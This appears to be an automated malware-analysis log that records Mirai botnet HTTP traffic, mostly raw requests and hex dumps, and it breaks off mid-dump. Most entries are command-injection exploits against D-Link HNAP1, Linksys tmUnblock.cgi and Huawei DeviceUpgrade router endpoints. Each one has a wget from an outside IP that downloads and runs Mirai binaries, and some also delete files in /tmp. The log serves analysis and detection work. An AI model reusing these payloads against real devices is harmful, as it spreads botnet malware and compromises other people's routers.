Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POSTData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POSTData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POSTData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POSTData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 